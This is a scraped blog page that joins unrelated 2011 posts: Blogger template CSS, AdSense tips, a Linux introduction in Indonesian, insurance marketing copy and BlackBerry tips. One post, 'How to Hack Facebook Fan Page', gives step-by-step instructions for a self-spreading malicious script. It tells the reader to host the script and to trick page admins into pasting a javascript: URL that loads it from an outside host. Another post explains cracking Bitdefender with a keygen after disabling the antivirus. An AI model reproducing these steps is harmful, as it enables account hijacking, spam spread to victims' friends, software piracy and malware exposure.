Senin, 31 Oktober 2011

Make Multi Column on Blogger Template

Hi guys? Meet again with me on Blogspot tutorial. This time, I would like to share my trick and tips to make multi column on blogger template. Like in wordpress, maybe you ever see any footer column which split into 2, 3, or even 4 parts. The question is, “do we can make the same thing in Blogger?” Of course we do. It will be very easy to build. Do you want to know more? Read it till end!


To make footer part become one column, it isn’t difficult as you imagine. But, you need a little trick to make the footer blog have multi column. To make you understand, I advise you to try it. Make a new blog for this little experiment (don’t do it on your main blog). In order to avoid any accident that might be happen..


First preparation that we need to give attention most is, width of our column that will be split into multi column, quantity of column that we going to make, space between one column to another column. But, templates in Blogger are so much. To make a deal with those problems, let’s use template Minima. Minima is original template that provide by Blogger with optional color white. Number of column that we are going to make is three column.


Original Minima template has 660 pixel column widths. We are going to make three columns, if we calculate it : 660px divide by 3 = 220px. With space (code to make space is padding) between column is 10px. Based on result of my calculation, column that we will make is 205px.


This is the steps to make multi column on blogger template :

Step 1:

   1. Don’t give a tick on white little box beside sentence, “expand widget template”. Or it will be twice more difficult.
   2. Add the code below exactly above code ]]></b:skin>

      

      /* bottom
      ==================== */

      #bottom {
      width: 660px;
      position: relative;
      clear:both;
      margin: 0 auto;
      color:#fff;
      float: left;
      background:#BDBABD;
      padding: 15px 0 15px 0;
      }

      #bottom h2 {
      padding: 5px 0 2px 0;
      margin: 0 0 10px 0;
      color:#ff5a00;
      font-size: 24px;
      letter-spacing: -1px;
      border-bottom: 1px solid #fff;
      }

      #bottom ul {
      padding: 0;
      margin: 0;
      }

      #bottom ul li {
      line-height: 26px;
      list-style-type: none;
      border-bottom: 1px dashed #031c5d;
      }

      #bottom ul li a {
      display: block;
      padding: 0 10px;
      color:#0701FD;
      text-decoration: none;

      }
      #bottom ul li a:hover {
      background: #B1ACB1;
      }

      #left-bottom {
      width: 205px;
      float: left;
      padding-left:10px;
      }

      #center-bottom {
      width: 205px;
      float: left;
      padding-left:10px;
      }

      #right-bottom {
      width: 205px;
      float: left;
      padding: 0 5px 0 10px;
      }
   3.

      Head to body under part of template code. Find out codes like this:

      

      <div id='footer-wrapper'>
      <b:section class='footer' id='footer'/>
      </div>

      
   4.

      Copy and paste code  below exactly above of the previous code.

      

      <div id='bottom'>

      <b:section class='bottom' id='left-bottom'/>

      <b:section class='bottom' id='center-bottom'/>

      <b:section class='bottom' id='right-bottom'/>

      </div>

      
   5.

      Click Save Template Buttons.
   6.

      It’s done!

How to Increase Adsense Earning The Easy Google Way

Google adsense is one of the most common and very extensively used revenue stream for most of the bloggers who strive to increase adsense earning through various ways. However, one must ensure to follow all the steps in agreement with Google adsense guidelines. Now, you can also let Google provides you a very personalize suggestion and tips to increase adsense earning. These suggestions and tips would be based totally on niche, traffic, visitors and other such parameters relevant and specific to your blog only. Already many bloggers have benefited by subscribing to this service and have reportedly increased adsense earning ranging from 51% to 200% and even higher. You can check out two such real life examples who have been able to receive significant positive result in their adsense earning, here. You can also subscribe to these personalize suggestions and tips to increase adsense earning. Just follow the below steps;

Steps to increase adsense earning

 
  • Logon to Adsense account.
  • Click –> Account Settings –> Edit Personal Settings
  • Tick the check box titled – “Customized help and performance suggestions” and Save.
Do provide your feedback about the above personalized suggestions by Google.

Pengenalan Linux

Kata"Linux"untuk saat ini sudah tidak asing lagi bagi para pengguna internet dan komunitas mahasiswa yang memiliki hobby untuk mencoba software-software baru.Secara teknis dan singkat dapat dikatakan, Linux adalah suatu sistem operasi yang bersifat multi user dan multi tasking, yang dapat berjalan di berbagai platform termasuk prosesor Intel 386 maupun yang lebih tinggi. Sistem operasi ini mengimplementasikan standar POSIX. Linux dapat berinteroperasi secara baik dengan sistem operasi yang lain, termasuk Apple, Microsoft dan Novell. Nama Linux sendiri diturunkan dari pencipta awalnya, Linus Torvalds, yang sebetulnya mengacu pada suatu kumpulan software lengkap yang bersama-sama dengan kernel menyusun suatu sistem operasi yang lengkap. Lingkungan sistem operasi ini mencakup ratusan program, termasuk kompiler, interpreter, editor dan utilitas. Perangkat bantu yang mendukung konektifitas, ethernet, SLIP dan PPP dan interoperabilitas. Produk perangkat lunak yang handal (reliable), termasuk versi pengembangan terakhir. Kelompok pengembang yang tersebar di seluruh dunia yang telah bekerja dan menjadikan Linux portabel ke suatu platform baru, begitu juga mendukung komunitas pengguna yang memiliki beragam kebutuhan dan juga pengguna dapat turut serta bertindak sebagai tim pengembang sendiri.
Sejarah Linux
Linux pada awalnya dibuat oleh seorang mahasiswa Finlandia yang bernama Linus Torvalds. Dulunya Linux merupakan proyek hobi yang diinspirasikan dari Minix, yaitu sistem UNIX kecil yang dikembangkan oleh Andrew Tanenbaum. Linux versi 0.01 dikerjakan sekitar bulan Agustus 1991. Kemudian pada tanggal 5 Oktober 1991, Linus mengumumkan versi resmi Linux, yaitu versi 0.02 yang hanya dapat menjalankan shell bash (GNU Bourne Again Shell) dan gcc (GNU C Compiler). Saat ini Linux adalah sistem UNIX yang sangat lengkap, bisa digunakan untuk jaringan, pengembangan software dan bahkan untuk pekerjaan sehari-hari. Linux sekarang merupakan alternatif sistem operasi yang jauh lebih murah jika dibandingkan dengan sistem operasi komersial (misalnya Windows 9.x/NT/2000/ME). Linux mempunyai perkembangan yang sangat cepat. Hal ini dapat dimungkinkan karena Linux dikembangkan oleh beragam kelompok orang. Keragaman ini termasuk tingkat pengetahuan, pengalaman serta geografis. Agar kelompok ini dapat berkomunikasi dengan cepat dan efisien, internet menjadi pilihan yang sangat tepat.
Karena kernel Linux dikembangkan dengan usaha yang independent, banyak aplikasi yang tersedia, sebagai contoh, C Compiler menggunakan gcc dari Free Software Foundation GNU’s Project. Compiler ini banyak digunakan pada lingkungan Hewlett-Packard dan Sun. Sekarang ini, banyak aplikasi Linux yang dapat digunakan untuk keperluan kantor seperti untuk spreadsheet, word processor, database dan program editor grafis yang memiliki fungsi dan tampilan seperti Microsoft Office, yaitu Star Office. Selain itu, juga sudah tersedia versi Corel untuk Linux dan aplikasi seperti Matlab yang pada Linux dikenal sebagai Scilab. Linux bisa didapatkan dalam berbagai distribusi (sering disebut Distro). Distro adalah bundel dari kernel Linux, beserta sistem dasar linux, program instalasi, tools basic, dan program-program lain yang bermanfaat sesuai dengan tujuan pembuatan distro. Ada banyak sekali distro Linux, diantaranya :
RedHat, distribusi yang paling populer, minimal di Indonesia. RedHat merupakan distribusi pertama yang instalasi dan pengoperasiannya paling mudah.
Debian,distribusi yang mengutamakan kestabilan dan kehandalan, meskipun mengorbankan aspek kemudahan dan kemutakhiran program. Debian menggunakan .deb dalam paket instalasi programnya.
Slackware,merupakan distribusi yang pernah merajai di dunia Linux. Hampir semua dokumentasi Linux disusun berdasarkan Slackware. Dua hal penting dari Slackware adalah bahwa semua isinya (kernel, library ataupun aplikasinya) adalah yang sudah teruji. Sehingga mungkin agak tua tapi yang pasti stabil. Yang kedua karena dia menganjurkan untuk menginstall dari source sehingga setiap program yang kita install teroptimasi dengan sistem kita. Ini alasannya dia tidak mau untuk menggunakan binary RPM dan sampai Slackware 4.0, ia tetap menggunakan libc5 bukan glibc2 seperti yang lain.
SuSE,distribusi yang sangat terkenal dengan YaST (Yet another Setup Tools) untuk mengkonfigurasi sistem. SuSE merupakan distribusi pertama dimana instalasinya dapat menggunakan bahasa Indonesia.
Mandrake,merupakan varian distro RedHat yang dioptimasi untuk pentium. Kalau komputer kita menggunakan pentium ke atas, umumnya Linux bisa jalan lebih cepat dengan Mandrake.
WinLnux,distro yang dirancang untuk diinstall di atas partisi DOS (WIndows). Jadi untuk menjalankannya bisa di-klik dari Windows. WinLinux dibuat seakan-akan merupakan suatu program aplikasi under Windows.
Dan masih banyak lagi distro yang lainnya
Kelebihan Linux
Di sini akan dijelaskan beberapa kelebihan dari sistem operasi Linux/UNIX dibandingkan dengan dengan sistem operasi yang lain. Dan berikut ini adalah beberapa fakta dari hal-hal yang menguntungkan dengan menggunakan program dan file-file Linux/UNIX :
Pada dasarnya semua data tersimpan di dalam harddisk walau ada beberapa kondisi dimana data tersimpan di disket. Linux/UNIX memberikan beberapa proses spesial dimana terminal, printer dan device hardware lainnya dapat diakses seperti kita mengakses file yang tersimpan dalam harddisk atau disket.
Ketika program dijalankan, program tersebut dijalankan dari harddisk ke dalam RAM dan setelah dijalankan akan dinamakan sebagai proses.
Linux/UNIX menyediakan servis untuk membuat, memodifikasi program, proses dan file.
Linux/UNIX mendukung struktur file yang bersifat hirarki.
Linux/UNIX adalah salah satu sistem operasi yang termasuk ke dalam kelas sistem operasi yang dapat melakukan multitasking. Multitasking sendiri adalah keadaan dimana suatu sistem operasi dapat melakukan banyak kerjaan pada saat yang bersamaan.
Selain multitasking, Linux/UNIX juga dapat mendukung multiuser. Yaitu sistem operasi yang pada saat bersamaan dapat digunakan oleh lebih dari satu user yang masuk ke dalam sistem. Bahkan untuk Linux juga mendukung untuk multiconsole dimana pada saat bersamaan di depan komputer langsung tanpa harus melalui jaringan dan memungkinkan lebih dari satu user masuk ke dakam sistem.
Bagian Sistem Operasi
Sistem Operasi Linux/UNIX terdiri dari kernel, program sistem dan beberapa program aplikasi. Kernel merupakan inti dari sistem operasi yang mengatur penggunaan memori, piranti masukan keluaran, proses-proses, pemakaian file pada file system dan lain-lain. Kernel juga menyediakan sekumpulan layanan yang digunakan untuk mengakses kernel yang disebut system call. System call ini digunakan untuk mengimplementasikan berbagai layanan yang dibutuhkan oleh sistem operasi. Program sistem dan semua program-program lainnya yang berjalan di atas kernel disebut user mode. Perbedaan mendasar antara program sistem dan program aplikasi adalah program sistem dibutuhkan agar suatu sistem operasi dapat berjalan sedangkan program aplikasi adalah program yang dibutuhkan untuk menjalankan suatu aplikasi tertentu. Contoh : daemon merupakan program sistem dan pengolah kata (word processor) merupakan program aplikasi.
Bagian Penting Kernel Linux
Kernel Linux terdiri dari beberapa bagian penting, seperti : manajemen proses, manajemen memori, hardware device drivers, filesystem drivers, manajemen jaringan dan lain-lain. Namun bagian yang terpenting ialah manajemen proses dan manajemen memori. Manajemen memori menangani daerah pemakaian memori, daerah swap, bagian-bagian kernel dan untuk buffer cache. Manajemen proses menangani pembuatan proses-proses dan penjadwalan proses. Pada bagian dasar kernel berisi hardware device drivers untuk setiap jenis hardware yang didukung.
PENING GAK?? KALO PENING prof dr blogger coretan rizal jelasin yang  akan kirim komen ke saya :)

Insurance and Healthcare

The Insurance industry is facing significant economic and competitive pressures, with consolidations and downgrades escalating and continuing competition from other financial services segments. In addition, the regulatory climate remains challenging and uncertain. Regulatory oversight changes and new compliance deadlines loom on the horizon. In spite of  this volatile business climate, insurers must continue to find ways to improve bottom-line operational efficiency and drive top-line growth, meeting the needs and expectations of customers and distributors while responding to increasing demands for business transparency.

How ‘iGATE Patni’ Can Help You
‘iGATE Patni’ has enabled insurance companies to defy challenges and improve business performance. For the last 30 years, we have drawn on the full breadth of our domain expertise and technological capabilities to help insurance companies implement solutions designed to deliver business outcomes.  Our unique Integrated Technology-Operations (iTOPS) approach offers a business outcome-based model thus adding certainty to the clients’ business; enabling them to derive maximum value at increasing business efficiency levels. The iTOPS approach means a ‘one view’ on our clients’ technology and operations, which helps in following a synergistic approach to achieve business benefits.

For Health Insurance Carriers, 'iGATE Patni' provides Full-Service Insurance Administration through CHCS Services, Inc. leveraging proprietary platform, licenses across all states in the Americas, and variable cost model. The variable model bundles in cost of application, infrastructure, people and processing in a "Per Member, per Month" construct or Cost per Policy, Cost Per claim construct.

‘iGATE Patni’ - one of the largest full spectrum service providers for the Insurance industry, has developed  IT Services, Infrastructure Management and Business Process Outsourcing solutions that enable insurers to grow their business while streamlining operations and remaining compliant. We assist our clients in achieving real differentiation through:

    Integrated IT & BPO business solutions such as Claims as a Service™,
    Solution accelerators in the form of frameworks, processes, and prototyping models for New Business Fulfillment and Policy Administration Modernization
    Integrated Consulting offerings for all insurance lines of business including ICD-10 assessments in the healthcare space.

End-to-End Insurance Solutions from 'iGate Patni'

Our IT consulting and insurance software solutions span across insurance lines of business including Life & Annuities, Property & Casualty/General Insurance, Reinsurance, and Healthcare. Over 5000+ dedicated personnel in the ‘IGATE Patni’ Insurance & Healthcare practice have deep domain understanding, expertise on legacy and modern technologies and systems, and experience implementing industry standards such as ACORD and ANSI  X-12

How to Hack Facebook Fan Page

Today I will show you how to hack a Facebook fan page. This is my first post at Hacking Truths and I am very excited about it. I hope you like this tutorial and give your feed back in the comments.
Now lets start the tutorial. First of all we will need to setup an exploit  and a website to host the exploit. If you already have a hosting then its great otherwise there are couple of free hosting websites that can be used for such purposes. I will tell you about it along with the tutorial.

Disclaimer: Coder and related sites are not responsible for any abuse done using this trick.
1. Download the exploit from this Link.
2. After downloading it, you need to edit the it. Get notepad++, one of my hot favorite editor. You can download it from here.

3. Open the file named pagehack.js with notepad++. Now find the text wamiqali@hungry-hackers.com by pressing ctrl+f and replace it with your own email id which you have used while signing up for facebook.

4. Now you have to change the viral text which will be sent to the friends of the victims. To do this, find the text Hey See what i got! and replace it with your own text. This text will be sent to the facebook wall of 15 friends of the victim. Since it is an autoposting bot, to prevent facebook from blocking it, I reduced its capacity to 15. Now just save it as anything.js (Tip: Be social engineer and rename it to something more attractive like getprizes.js or booster.js)

5. Now you have to upload this script to your server. For this make an account at 0fess.net or 000webhost.com (t35 or 110mb won’t help this time) and use filezilla and upload this to your root. So the address where your script is uploaded will be as follows:
www.yoursite.0fess.net/booster.js
6. Now comes the most important part of this Hack. You need to convince the admin of that Fan page to put the following code (Note: Don’t forget to replace the text in bold with the address of your script) in his browser’s address bar and hit enter while he is on Facebook.
javascript:(a = (b = document).createElement(“script”)).src = “//www.yoursite.0fess.net/booster.js“, b.body.appendChild(a); void(0)
Tip: You can fool him by making him greedy to grab something. You can also encode this in ASCII format for more better results.

Bitdefender Total Security 2012 Full crack, keygen

Bitdefender salah satu antivirus yang paling top. Nah…baru-baru ini Bitdefender telah mengeluarkan produk 2012. Untuk menikmatinya, anda dapat mendownload dari link bitdefender, tetapi masih trial 30 hari.

Untuk itu saya coba share membuat bitdefender total security 2012 menjadi full alias expired sampai 12779 hari.


Pertama Download dulu bitdefender trial version.. Untuk yang 32 bit dapat anda download Disini
Selanjutnya silahkan download Jamunya Disini


Langkah- langkah nya :
1. Install bitdefender total security yang trial version
2. Setelah bitdefender nya terinstall, disable antivirus nya ( jadikan Off ) dan extrak jamu tadi.
3. Restar komputer dengan safe mode
4. Cari file jamu tadi, dan double klik Box_BD2011.exe lalu pilih 2045
5. Restar kembali komputer dengan normal mode.
6. Lihat hasil nya pada bitdefender total security 2012 anda :D

Download from Rapidshare Unlimited 24X7 365 days

I've got a new trick to download from files-hosting sites like rapidshare, megaupload.

The trick is very simple as 1,2,3.

You must have mozilla firefox.

Just download this mozilla addon and download from rapidshare 24/7 without waiting any time no limit.

But only 1 thing is that it gives resume support every time. But not give full speed. In IDM it gives only 1 segment. But always give resume. It means it gives free user speed.

Some features of this addon

Auto download RS&MU files, and more.

(1)One download, you can open the link in the address bar

(2)Multiple downloads, just copy and paste the links into the downloader. Download files one by one and wait website's Wait-Time period for next file.

Supporting sites

rapidshare.com
megaupload.com
mediafire.com
depositfiles.com
uploading.com
4shared.com
sendspace.com
enterupload.com



Download this addon





https://static.addons.mozilla.net/_files/290138/rapidsharemegaupload_downloader-2.0.3-fx.xpi


Just open any rapidshare link in firefox and direct download.

First time it will not show you resume, but you do again pause and resume your download and you will see that it supports resume.

Here is idm speed using rapidshare link.




So enjoy without using any help. I know it does not give full speed. But we can use it in emergency when rapidleech or premium accounts or any other method is not working.

It is useful to download small file size which are under 10 MB.

Source :

https://addons.mozilla.org/en-US/firefox/addon/rapidshare-downloader/

I have tried this only in rapidshare. Not tried other yet. So you try and reply that it is working or not.

Cara Memasang Widget Networkedblogs di Blog

Untuk membuatnya, silakan ikuti langkah-langkah berikut :

  • Buka Facebook dan Sign In dengan akun Anda
  • Bukalah halaman :
    http://apps.facebook.com/blognetworks/
  • Lalu klik tombol “+ Register a New Blog“. Maka akan terlihat seperti screenshot di bawah ini :
    Cara Memasang Widget Networkedblogs di Blog
  • Isikan data di atas, seperti :
    - Blog Name : Nama blog Anda
    - URL : Alamat blog Anda, dimulai dari http://
    - Topics : Masukkan 3 topik yang menurut Anda paling pas untuk menggambarkan blog Anda
    - Language : Pilih bahasa blog Anda
    - Description : Isikan deskripsi blog Anda
  • Lalu klik tombol “Next” , hingga sampai seperti screenshot di bawah ini :
    Cara Memasang Widget Networkedblogs di Blog
  • Klik YES
  • Lalu masuk ke halaman klaim blog. Anda bisa meng-klaim blog dengan 2 cara. Yaitu membertahukan ke teman Anda bahwa Anda benar-benar admin blog tersebut, atau dengan memasang Widget Networkedblogs. Pilihlah - Use our widget to verify ownership (instant, but some technical skills required).
  • Lalu munculah script code, Copy kode yang diberikan, dan paste kode di theme blog Anda.

Seting BlackBerry Menjadi Modem

kali ini adalah Setting BB sebagai Modem Memang Sekarang Blackberry lagi trend di kalangan anak muda, tidak seperti sebelumnya, blackberry adalah barang mewah dan hanya di pakai oleh kalangan Bussinesmen saja, sesuai dengan perkembangannya dan berkembangnya dunia internet mobile maka sekarang blackberry sudah merambah di semua segmen pasar, kali ini kita akan membahas Tutorial cara setting blackberry sebagai modem, langsung saja berikut langka untuk mengatur /setting blackberry sebagai modem agar bisa di kita connect ke PC atau Laptop dan bisa terhubung ke internet;

 " Meskipun Saya Sendiri Belum Memiliki Blackberry ^_^  "

Handset Blackberry anda ternyata dapat digunakan sebagai modem untuk koneksi ke internet.

Pengenalan IT (Information Teknologi)

Teknologi Informasi
Pendorong :


  1. Rasa ingin tahu.
  2. Tidak mau ketinggalan
  3. Keterpaksaan / tuntutan.
  4. Lingkungan
  5. Mengerti manfaat “IT”
Penghambat :
  1. Pemikiran kuno / kolot.
  2. Tidak mau tahu.
  3. Tidak mengerti manfaat “IT”
  4. Tidak ada support.
  5. Merasa sudah pintar.

Mengapa perlu belajar “IT” ?

  1. Mempercepat dan mempermudah pekerjaan.
  2. Mengurangi biaya.
  3. Meningkatkan keamanan.
  4. Memperlancar komunikasi.
  5. Meningkatkan Brand.
  6. Memepermudah penyimpanan dan pencarian informasi.
  7. Pencapaian hasil optimal.
  8. dll. 

 
Design by Wordpress Theme | Bloggerized by Free Blogger Templates | coupon codes